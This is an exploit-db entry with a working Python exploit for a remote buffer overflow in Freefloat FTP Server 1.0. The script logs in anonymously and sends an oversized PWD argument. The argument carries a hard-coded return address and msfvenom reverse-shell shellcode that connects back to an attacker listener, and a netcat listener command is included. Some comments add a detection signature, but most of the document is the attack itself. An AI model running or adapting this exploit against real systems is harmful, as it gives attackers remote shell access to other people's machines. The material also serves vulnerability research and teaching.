Freefloat FTP Server 1.0 – ‘PWD’ Remote Buffer Overflow

  • 作者: Waqas Ahmed Faroouqi
    日期: 2023-09-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51706/
  • #Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow
    #Date: 08/22/2023
    #Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
    #Vendor Homepage: http://www.freefoat.com
    #Version: 1.0
    #Tested on Windows XP SP3 
    
    
    #!/usr/bin/python
    
    import socket
    
    #Metasploit Shellcode
    #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d' 
    
    #nc -lvp 4444
    #Send exploit
    
    
    #offset = 247 
    #badchars=\x00\x0d
    #return_address=\x3b\x69\x5a\x77 (ole32.dll)
    
    # Encoder output from the msfvenom command noted above: a Windows reverse
    # TCP shell stage, encoded so that it contains neither of the two bytes
    # listed as badchars (0x00 and 0x0d) -- the FTP command line cannot carry them.
    # NOTE(review): written for Python 2 (#!/usr/bin/python above); these are
    # str literals, one byte per escape, and are concatenated with str below.
    payload = (
    "\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9"
    "\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca"
    "\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83"
    "\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26"
    "\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49"
    "\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54"
    "\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66"
    "\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1"
    "\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a"
    "\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82"
    "\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7"
    "\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9"
    "\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41"
    "\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac"
    "\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a"
    "\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc"
    "\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4"
    "\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f"
    "\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29"
    "\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf"
    "\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7"
    "\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d"
    "\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac"
    "\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6"
    "\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0"
    "\x19")

    # Overflow buffer sent as the argument to PWD (~612 bytes in total):
    #   'A' * 247           filler up to the saved return address (#offset above)
    #   "\x3b\x69\x5a\x77"  return address from ole32.dll per the comment above
    #                       (presumably little-endian, i.e. 0x775a693b)
    #   '\x90' * 10         short NOP sled leading into the stage
    #   payload             the encoded stage defined just above
    # Defensive note: PWD takes no argument in FTP, so a PWD carrying a
    # several-hundred-byte argument (or a long run of 0x41) right after an
    # anonymous login is the observable signature of this class of bug.
    shellcode = 'A' * 247 + "\x3b\x69\x5a\x77" + '\x90' * 10 + payload
    
    def main():
        """Connect to the FTP service, log in anonymously, send the oversized PWD.

        Nothing is returned. The recv() calls only step through the FTP
        dialogue; none of the server replies are checked, and no error
        handling exists for a refused connection or a closed socket.
        """
        # Lab target from the original write-up (RFC 1918 private address);
        # the reverse-shell listener is the LHOST/LPORT noted in the header.
        ip = '192.168.146.135'
        port = 21

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((ip, port))

        # Banner, then the two-step anonymous login. Hard-coded credentials;
        # a successful anonymous login is itself a precondition worth logging.
        sock.recv(1024)
        sock.send('USER anonymous\r\n')
        sock.recv(1024)
        sock.send('PASS anonymous\r\n')
        sock.recv(1024)
        # The oversized argument to PWD is the trigger the write-up describes.
        # On the wire this is one FTP command line of roughly 600 bytes.
        sock.send('pwd ' + shellcode + '\r\n')
        sock.close()
    
    if __name__ == '__main__':
        # Script entry point; nothing runs on import.
        main()